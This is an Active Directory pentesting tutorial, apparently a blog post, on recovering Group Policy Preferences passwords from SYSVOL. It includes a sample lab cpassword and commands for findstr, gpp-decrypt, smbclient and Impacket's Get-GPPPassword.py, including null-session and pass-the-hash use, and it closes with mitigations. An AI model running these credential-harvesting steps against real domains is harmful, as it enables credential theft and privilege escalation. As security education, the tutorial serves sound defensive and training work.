Attacking GPP(Group Policy Preferences) Credentials | Active Directory Pentesting
A very common and easy attack that provides user credentials stored in SYSVOL share that can be used to get a shell or escalate privileges.
Background:
Group Policy Preferences (GPP) allowed administrators to create domain policies with embedded credentials. Wait, but what is GPP?
Group Policy Preferences is a collection of Group Policy client-side extensions that deliver preference settings to domain-joined computers running Microsoft Windows desktop and server operating systems.
To put it simply, GPP is a tool that provides some advanced capabilities to administrators for configuring and managing account policy in a Windows domain network.
These policies allowed them to set local accounts, and embed credentials for various purposes that may otherwise require an embedded password in a script. So when a new Group Policy Preference (GPP) is generated, a xml file (generally Groups.xml) with the configuration data, including any passwords associated with the GPP, is created in the SYSVOL share which are folders on domain controllers accessible and readable to all authenticated domain users.
For protection Microsoft encrypts the password using AES before it is stored as “cpassword”. But the keys are available publically on MSDN!
The Domain Group Policies are stored at:
\\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\The cpassword stored in XML file looks like:
└─$ cat Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
...
D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1"
...So there are some scenarios in which we can read these files:
- We already have a low privileged shell on the system so we can search for the XML file in SYSVOL share.
- We are able to access SMB file shares anonymously (without any passwords) due to guest access allowed and that share has XML file hosted.
- Any Other Vulnerablity that exposes or allow access to XML file.
Affected Systems:
Microsoft has listed the affected systems here.
Exploitation:
There are many ways to find and easily decrypt the password as:
- If we already have shell access then we can search for the string as keyword “cpassword” has value equal to the password:
findstr /S /I cpassword \\<DOMAIN>\sysvol\<DOMAIN>\policies\*.xmlThen decrypting it with the kali tool to get a cleartext password which can later be used to escalate privilege:
gpp-decrypt <hash>2. If we are allowed to connect to any share as guest then we can find the cpassword value from the files on SYSVOL and pass them to the gpp-decrypt:
$ smbclient \\\\ip_address\\share
> mget * (to list all the files including policies)3. Use impacket module Get-GPPPassword.py to search and dump the password:
#with a NULL session
Get-GPPPassword.py -no-pass 'DOMAIN_CONTROLLER'
#with cleartext credentials
Get-GPPPassword.py 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER'
#pass the hash(with an NT hash)
Get-GPPPassword.py -hashes :'NThash' 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER'
#parse a local file
Get-GPPPassword.py -xmlfile '/path/to/Policy.xml' 'LOCAL'4. Use powersploit module Get-GPPPassword.ps1 or Metasploit module ‘auxiliary/scanner/smb/smb_enum_gpp’ or ‘post/windows/gather/credentials/gpp’ to automatically find and get the cleartext password.
Mitigation:
- Install KB2962486 as addressed in MS14–025 on every computer used to prevent new credentials from being added to Group Policy Preferences.
- Delete any existing GPP xml files containing passwords in SYSVOL.
- Passwords should not be stored in files available to all authenticated users.
